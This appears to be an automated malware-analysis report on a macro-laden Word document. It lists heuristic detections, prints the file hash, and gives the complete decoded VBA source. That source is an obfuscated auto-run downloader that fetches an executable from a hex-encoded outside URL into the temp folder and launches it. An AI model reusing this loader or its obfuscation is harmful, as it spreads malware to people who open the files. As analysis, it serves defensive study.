MALICIOUS
Risk Score: 386
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1105 Ingress Tool Transfer
The sample contains obfuscated VBA macros that utilize the URLDownloadToFileA API, a strong indicator of downloading a secondary payload. The AutoOpen macro is present, suggesting automatic execution upon opening the document. The presence of CreateObject and Shell execution tokens further supports the malicious intent of executing downloaded content.
Heuristics (12)
- ClamAV: Doc.Downloader.Macr-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Macr-1
- Reference to URLDownloadToFile API (critical, SC_STR_URLDOWNLOAD): Reference to URLDownloadToFile API
- VBA macros detected (medium, 7 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- URLDownloadToFile in VBA (critical, OLE_VBA_DOWNLOAD): URLDownloadToFile in VBA. Matched line in script: Private Declare PtrSafe Function URLDownloadToFileA Lib "urlmon" (ByVal NRTMLM As Long, _
- Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source. Matched line in script: Set fdfgdfeer4gf = CreateObject(HexToString("5368656C6C2E4170706C69636174696F6E"))
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call. Matched line in script: Set fdfgdfeer4gf = CreateObject(HexToString("5368656C6C2E4170706C69636174696F6E"))
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script: Sub AutoOpen()
- Workbook_Open macro (low, OLE_VBA_WBOPEN): Workbook_Open macro. Matched line in script: Sub Workbook_Open()
- Environ() call (env variable access) (low, OLE_VBA_ENVIRON): Environ() call (env variable access). Matched line in script: pPPhujkfg = Environ(HexToString("54454D50")) & HexToString("5C3156324D555932585759534658512E657865")
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5799 bytes |

SHA-256: e75a5b8a063476f1f20a0a07c77e60a759f41f41584cdb7ac76b255f6957e7f7

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. 62 of 100 identifiers look randomly generated (e.g. 'pJIBidfsdfgF') — consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If Win64 Then
Private Declare PtrSafe Function URLDownloadToFileA Lib "urlmon" (ByVal NRTMLM As Long, _
ByVal UUQCES As String, ByVal VKDDKH As String, ByVal XXRYIY As Long, _
ByVal RPBFSI As Long) As Long
#Else
Private Declare Function URLDownloadToFileA Lib "urlmon" (ByVal NRTMLM As Long, _
ByVal UUQCES As String, ByVal VKDDKH As String, ByVal XXRYIY As Long, _
ByVal RPBFSI As Long) As Long
#End If
Sub pJIBidfsdfgF()
Dim eEvLrfmk As Integer
For eEvLrfmk = 0 To 3
Dim baWfWDze As Integer
For baWfWDze = 0 To 7
Dim SAYgiaqO As Integer
For SAYgiaqO = 0 To 3
DoEvents
Next SAYgiaqO
DoEvents
Next baWfWDze
Dim YqYhypAo As Integer
For YqYhypAo = 0 To 4
DoEvents
Next YqYhypAo
DoEvents
Next eEvLrfmk
Dim EEVzDOFd As Integer
For EEVzDOFd = 0 To 7
Dim zPXimGvf As Integer
For zPXimGvf = 0 To 8
DoEvents
Next zPXimGvf
DoEvents
Next EEVzDOFd
Dim pLIoZUak As Integer
For pLIoZUak = 0 To 9
DoEvents
Next pLIoZUak
dfgfdYUHKJ
End Sub
Sub AutoOpen()
Dim EbjbQDPq As Integer
For EbjbQDPq = 0 To 4
Dim CdllBhov As Integer
For CdllBhov = 0 To 7
Dim PQHZWtCI As Integer
For PQHZWtCI = 0 To 9
DoEvents
Next PQHZWtCI
DoEvents
Next CdllBhov
Dim kCQNamsp As Integer
For kCQNamsp = 0 To 5
DoEvents
Next kCQNamsp
DoEvents
Next EbjbQDPq
Dim twymuiQZ As Integer
For twymuiQZ = 0 To 9
Dim gdlbxxrS As Integer
For gdlbxxrS = 0 To 5
DoEvents
Next gdlbxxrS
DoEvents
Next twymuiQZ
Dim wwtnRgYJ As Integer
For wwtnRgYJ = 0 To 6
DoEvents
Next wwtnRgYJ
pJIBidfsdfgF
End Sub
Sub Workbook_Open()
Dim lSDSjaIX As Integer
For lSDSjaIX = 0 To 5
Dim sTDHWGDR As Integer
For sTDHWGDR = 0 To 4
Dim sRKbXAsB As Integer
For sRKbXAsB = 0 To 8
DoEvents
Next sRKbXAsB
DoEvents
Next sTDHWGDR
Dim tkwqbUkk As Integer
For tkwqbUkk = 0 To 6
DoEvents
Next tkwqbUkk
DoEvents
Next lSDSjaIX
Dim lFnJrYhI As Integer
For lFnJrYhI = 0 To 5
Dim TlJYcqhc As Integer
For TlJYcqhc = 0 To 4
DoEvents
Next TlJYcqhc
DoEvents
Next lFnJrYhI
Dim vumjzjmH As Integer
For vumjzjmH = 0 To 3
DoEvents
Next vumjzjmH
pJIBidfsdfgF
End Sub
Sub dfgfdYUHKJ()
Dim OLyhOPhV As Integer
For OLyhOPhV = 0 To 5
Dim ggfGxPRk As Integer
For ggfGxPRk = 0 To 1
Dim ZPjYCgvP As Integer
For ZPjYCgvP = 0 To 9
DoEvents
Next ZPjYCgvP
DoEvents
Next ggfGxPRk
Dim OLrUtuaF As Integer
For OLrUtuaF = 0 To 8
DoEvents
Next OLrUtuaF
DoEvents
Next OLyhOPhV
Dim lJjEgYjA As Integer
For lJjEgYjA = 0 To 2
Dim WbfHdOwR As Integer
For WbfHdOwR = 0 To 1
DoEvents
Next WbfHdOwR
DoEvents
Next lJjEgYjA
Dim RvlvZBKy As Integer
For RvlvZBKy = 0 To 7
DoEvents
Next RvlvZBKy
ioHBKJdg = HexToString("687474703A2F2F73756E66756E672E686B2F6A732F62696E2E657865")
Dim RxEAjGVp As Integer
For RxEAjGVp = 0 To 1
Dim CgfDTtIw As Integer
For CgfDTtIw = 0 To 4
Dim FgQeLJJU As Integer
For FgQeLJJU = 0 To 6
DoEvents
Next FgQeLJJU
DoEvents
Next CgfDTtIw
Dim mUycLsvf As Integer
For mUycLsvf = 0 To 2
DoEvents
Next mUycLsvf
DoEvents
Next RxEAjGVp
Dim HzKcpqDF As Integer
For HzKcpqDF = 0 To 3
Dim OMaGEVHE As Integer
For OMaGEVHE = 0 To 3
DoEvents
Next OMaGEVHE
DoEvents
Next HzKcpqDF
Dim lLycLgdt As Integer
For lLycLgdt = 0 To 2
DoEvents
Next lLycLgdt
pPPhujkfg = Environ(HexToString("54454D50")) & HexToString("5C3156324D555932585759534658512E657865")
Dim DworZYei As Integer
For DworZYei = 0 To 6
Dim upqzZMmH As Integer
For upqzZMmH = 0 To 7
Dim HrUkDKOk As Integer
For HrUkDKOk = 0 To 1
DoEvents
Next HrUkDKOk
DoEvents
Next upqzZMmH
Dim sEVeUqFO As Integer
For sEVeUqFO = 0 To 7
DoEvents
Next sEVeUqFO
DoEvents
Next DworZYei
Dim DxzQCjfE As Integer
For DxzQCjfE = 0 To 6
Dim NNAFobqA As Integer
For NNAFobqA = 0 To 5
DoEvents
Next NNAFobqA
DoEvents
Next DxzQCjfE
Dim IBTxvGUe As Integer
For IBTxvGUe = 0 To 8
DoEvents
Next IBTxvGUe
R = URLDownloadToFileA(0&, ioHBKJdg, pPPhujkfg, 0&, 0&)
Dim QThZvUng As Integer
For QThZvUng = 0 To 2
Dim jBETMSlj As Integer
For jBETMSlj = 0 To 5
Dim pHJEOhLq As Integer
For pHJEOhLq = 0 To 1
DoEvents
Next pHJEOhLq
DoEvents
Next jBETMSlj
Dim kMNMqpIw As Integer
For kMNMqpIw = 0 To 2
DoEvents
Next kMNMqpIw
DoEvents
Next QThZvUng
Dim qDujcKvO As Integer
For qDujcKvO = 0 To 4
Dim WZeUslhK As Integer
For WZeUslhK = 0 To 7
DoEvents
Next WZeUslhK
DoEvents
Next qDujcKvO
Dim zQGIlsKX As Integer
For zQGIlsKX = 0 To 8
DoEvents
Next zQGIlsKX
Set fdfgdfeer4gf = CreateObject(HexToString("5368656C6C2E4170706C69636174696F6E"))
fdfgdfeer4gf.Open pPPhujkfg
End Sub
Public Function HexToString(ByVal jYsjanx As String) As String
Dim gTFhDP As String
Dim LdOSt As String
Dim eYqnKg As Long
For eYqnKg = 1 To Len(jYsjanx) Step 2
Dim KznwAUrB As Integer
For KznwAUrB = 0 To 7
Dim CcuMacGs As Integer
For CcuMacGs = 0 To 7
DoEvents
Next CcuMacGs
DoEvents
Next KznwAUrB
Dim tYMWohkh As Integer
For tYMWohkh = 0 To 9
DoEvents
Next tYMWohkh
gTFhDP = Chr$(Val(Chr$(38) & Chr$(72) & Mid$(jYsjanx, eYqnKg, 2)))
Dim HdUMvIny As Integer
For HdUMvIny = 0 To 1
Dim kiZssepc As Integer
For kiZssepc = 0 To 5
DoEvents
Next kiZssepc
DoEvents
Next HdUMvIny
Dim sHZspsnX As Integer
For sHZspsnX = 0 To 7
DoEvents
Next sHZspsnX
LdOSt = LdOSt & gTFhDP
Next eYqnKg
Dim MFPIjRfh As Integer
For MFPIjRfh = 0 To 4
Dim xAlzqaHp As Integer
For xAlzqaHp = 0 To 8
DoEvents
Next xAlzqaHp
DoEvents
Next MFPIjRfh
Dim EPtelKlg As Integer
For EPtelKlg = 0 To 7
DoEvents
Next EPtelKlg
HexToString = LdOSt
End Function